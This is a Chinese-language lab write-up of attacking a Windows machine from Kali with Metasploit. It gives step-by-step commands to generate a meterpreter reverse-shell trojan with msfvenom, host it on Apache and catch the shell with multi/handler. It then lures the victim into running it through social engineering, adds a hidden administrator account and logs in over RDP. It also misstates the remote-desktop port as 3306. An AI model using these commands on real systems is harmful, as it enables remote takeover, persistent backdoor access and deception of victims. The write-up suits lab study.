kail基于Debian的数字取证系统,上面集成很多渗透工具,其前身是BT5 (R3)(BrackTrack)。
其中Metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用Ruby开发的,使用方便,使用该工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF之前要开启该数据库。
step1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128 lport=555 -f exe >/root/桌面/evilshell.exe
-p -参数后跟上payload,攻击成功后要做什么事情;
lhost 后跟监听的IP
lport 后跟监听的端口
-f 后跟要监听的后门类型
step2:将木马文件evishell.exe文件放到/var/www/html文件夹下,开启Apache,在Windows里输入kail的ip,下载到桌面
step3:开启MSF,msfconsole(提前查看postgresql运行状态)
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion
Exploits :开发利用,攻击某些服务、平台、系统等用到的工具
Payload:载荷载体,攻击成功后要操作什么
Msf>use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >show options
msf5 exploit(multi/handler) > set lhost 192.168.16.128
msf5 exploit(multi/handler) > set lport 555
msf5 exploit(multi/handler) > exploit
step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kail中就会得到肉鸡的shell(meterpreter)
.png)
meterpreter>shell
ipconfig
net user hacker$ 123.c /add
net localgroup administrators hacker$ /add
step5:在kail中开一个新终端,rdesktop 192.168.16.131
实验反思:使用win7系统实验失败,建议换成win service 2008 r2:
win7默认远程桌面(3306)端口是不开的,win7默认的cmd不是管理员权限,没有创建用户的权限,我在win7系统中用管理员打开cmd创建hacker(net user hacker$ 123.c /add),加入到管理员用户组(net localgroup Administrator hacker$ /add),然后在kail里远程连接(rdesktop 192.168.16.131),显示会挤掉win7正在登陆的用户,而win7那边也有提示。。。。。。。